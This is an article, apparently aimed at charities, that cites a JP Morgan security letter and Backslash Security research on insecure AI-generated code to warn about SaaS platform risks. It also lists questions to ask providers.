JP Morgan’s warning and new research reveal the hidden risks of insecure SaaS platforms built at speed.
The invisible risk beneath the surface
Charities today are increasingly reliant on digital platforms to manage grants, store confidential beneficiary information, and streamline operations. But a recent open letter from JP Morgan Chase’s Chief Information Security Officer has sounded the alarm: the very SaaS models enabling this digital transformation are embedding unseen vulnerabilities into critical systems.
And new research from Backslash Security highlights why: AI-assisted development tools, widely adopted by developers to code faster, are introducing security weaknesses at scale.
For charities handling sensitive data, the convergence of these risks could have devastating consequences.
AI-driven development: speed without safeguards?
The rise of AI coding assistants – tools like Cursor, Copilot, and others – is reshaping how software is built. Developers, including those without deep technical expertise, are using AI to accelerate development, ship features faster, and meet growing demands.
But Backslash Security’s research reveals a troubling truth: unless explicitly prompted with detailed, security-focused instructions, AI-generated code is insecure by default. In testing, even advanced models like GPT-4o and Claude left critical vulnerabilities – such as XSS, SSRF, command injection, and CSRF – unaddressed in 40% to 90% of outputs.
This finding echoes JP Morgan’s broader concern: software providers are prioritising speed and feature delivery over robust security. For charities adopting platforms developed with AI tools and rapid iteration, this raises an uncomfortable question: how secure is the code handling your most sensitive data?
The collapse of security boundaries
Historically, strong security relied on architectural safeguards: strict segmentation between internal and external systems, layered access controls, and limited trust between components. JP Morgan’s letter warns that modern SaaS models – especially those built with rapid AI-assisted development – dismantle these boundaries.
Instead of carefully separated systems, we now see direct integrations between third-party services and sensitive internal data, often relying on simple authentication tokens and broad permissions. As the letter states, “this architectural regression undermines fundamental security principles.”
For charities trusting platforms to manage confidential beneficiary data, this risk is not theoretical. One weak integration, one compromised token, or one overlooked vulnerability in a rapidly developed platform could expose entire communities.
Insecure by default: the evidence
Backslash Security’s study tested leading AI models by asking them to generate common functionality -like a comment section or file upload feature – without specific security prompts. The results were alarming:
- GPT-4o produced vulnerable code 90% of the time.
- Even Claude, one of the best performers, was vulnerable 40% of the time.
- Vulnerabilities included XSS, SSRF, command injection, CSRF, and insecure file handling.
Only when detailed, security-focused prompts – or dedicated security rules – were applied did the models consistently generate secure code. This reinforces JP Morgan’s warning: security must be built-in by design, not added as an afterthought.
In an industry moving towards AI-assisted, fast-paced development, platforms without formal security guardrails risk embedding systemic vulnerabilities into the very tools charities depend on.
But what does this mean in practice? For a charity, it could mean a cyber attacker exploiting one of these hidden vulnerabilities to access sensitive beneficiary data – names, addresses, medical histories, financial details. It could mean unauthorised access to grant applications, internal communications, or even bank account information. Beyond data loss, the reputational damage could be irreversible, undermining donor trust and endangering future funding. A single breach doesn’t just expose data; it compromises the people and communities charities exist to protect.
What this means for charities
Choosing a platform isn’t just about features or speed to market. It’s about trust.
A platform developed with AI tools, rushed timelines, and without rigorous security oversight may function beautifully – until it doesn’t. A breach won’t just affect one charity; it could ripple across every organisation sharing that platform.
When selecting a provider to handle sensitive operations, charities must ask hard questions:
- How was the platform developed, and what security processes were followed?
- How are security risks identified, mitigated, and validated?
- Is the platform audited beyond annual compliance checkboxes?
- How is beneficiary data protected from unauthorised access or breach?
In conclusion: build on trust, not just speed
JP Morgan’s letter and Backslash Security’s findings both point to the same conclusion: in today’s digital landscape, speed and convenience cannot come at the expense of security.
Charities must partner with platforms that treat security as a first principle – not as an optional layer or marketing slogan. Because when it’s your beneficiaries’ data, your donors’ trust, and your mission on the line, shortcuts aren’t an option.
In a world where AI accelerates development, it’s those who embed security from the start who will earn-and deserve – your trust.